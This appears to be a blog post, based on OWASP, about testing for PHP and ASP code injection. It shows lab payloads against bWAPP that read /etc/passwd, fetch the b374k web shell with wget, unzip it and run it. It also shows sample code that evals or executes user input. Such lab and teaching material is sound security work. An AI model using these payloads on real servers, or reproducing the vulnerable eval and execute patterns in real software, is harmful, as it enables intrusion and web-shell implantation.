i Code injection – All things in moderation

Code injection




  • Source: owasp
  • Code injection: is the exploitation of a computer bug , it is possible to enter code as input web page and have it executed by the web server. In Code injection testing, a tester submits input that is processed by the webserver as dynamic code as an included file. Thes tests can target various server-side scripting engines, e.g.. , ASP or PHP.
  • Testing for PHP Injection vulnerabilites
    • Using the querystring, the tester can inject code (in this example, a malicious URL) to be processed as part of the included file: Example lab bWAPP:
      -Inject dynamic code :
      http://192.168.5.161/bWAPP/phpi.php?message=print%28shell_exec%28%27cat%20/etc/passwd%27%29%29;
      Screenshot from 2016-07-11 12:02:51
      – Inject include file:
      Upload shell:
      http://192.168.5.161/bWAPP/phpi.php?message=exec(‘wget https://github.com/b374k/b374k/archive/master.zip’);Screenshot from 2016-07-11 14:20:06
      Unzip:
      http://192.168.5.161/bWAPP/phpi.php?message=exec%28%27unzip%20master.zip%20-d%20b374k%27%29;
    • Run shell:
      http://192.168.5.161/bWAPP/b374k/b374k-master/
      Screenshot from 2016-07-11 14:25:41source execute querystring:

       <p><i><?php @eval (“echo ” . $_REQUEST[“message”] . “;”);?></i></p>

  • Testing for ASP code injection vulnerabilites
    Examine ASP code for user input used in execution functions. Can the user enter commands into the Data input field? Here, the ASP code will save the input to a file and then execute it:

    <%
    If not isEmpty(Request( "Data" ) ) Then
    Dim fso, f
    'User input Data is written to a file named data.txt
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True)
    f.Write Request("Data") & vbCrLf
    f.close
    Set f = nothing
    Set fso = Nothing
    
    'Data.txt is executed
    Server.Execute( "data.txt" )
    
    Else
    %>
    <form>
    <input name="Data" /><input type="submit" name="Enter Data" />
    </form>
    <%
    End If
    %>)))
    

Leave a Reply